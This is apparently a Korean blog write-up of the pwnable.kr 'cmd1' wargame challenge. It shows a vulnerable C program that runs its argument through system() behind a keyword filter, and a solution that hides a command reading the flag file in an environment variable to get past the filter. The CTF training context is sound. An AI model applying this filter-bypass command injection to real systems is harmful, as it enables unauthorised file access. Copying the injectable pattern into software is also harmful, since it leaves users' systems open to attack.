[1pt]cmd1

Pwnable.kr 2015. 8. 6. 22:18 
#include <stdio.h> 
#include <string.h> 

int filter(char* cmd){

        int r=0;

        r += strstr(cmd, "flag")!=0;

        r += strstr(cmd, "sh")!=0;

        r += strstr(cmd, "tmp")!=0;

        return r;

}

int main(int argc, char* argv[], char** envp){

        putenv("PATH=/fuckyouverymuch");

        if(filter(argv[1])) return 0;

        system( argv[1] );

        return 0;

}


Introduction:

본 문제는 환경변수를 이용해 flag를 출력하는 문제


Command line:

cmd1@ubuntu:/tmp/Aitch_cmd1$ export F="/bin/cat /home/cmd1/flag"

cmd1@ubuntu:/tmp/Aitch_cmd1$ /home/cmd1/cmd1 \${F}

mommy ~!@#%^&*()_+~!@#$%^&*()_+~!@#$%^&*()_+

cmd1@ubuntu:/tmp/Aitch_cmd1$ 



Reference:

1) 환경변수 - linux: http://kiros33.blog.me/220270849224

'Pwnable.kr' 카테고리의 다른 글

[3pt]collision  (0) 2015.08.07
[1pt]mistake  (0) 2015.08.06
[1pt]fd  (0) 2015.08.06
[5pt]bof  (0) 2015.08.06
[1pt]random  (0) 2015.08.06
Posted by Hugh_K
l
블로그 이미지
Hugh's Lab CIST, Korea University aitch25@korea.ac.kr Hugh_K

최근에 올라온 글

공지사항

카테고리

분류 전체보기 (39)
Implementation (2)
Algorithms (2)
FTZ (20)
Pwnable.kr (8)
Researchs Review (2)
Drone Project (0)
Wifi_Hacking (3)
Fuzzing study (1)
Machine learning study (0)
미공개 연구들.. (1)
etc.. (0)

태그목록

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

링크

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

티스토리툴바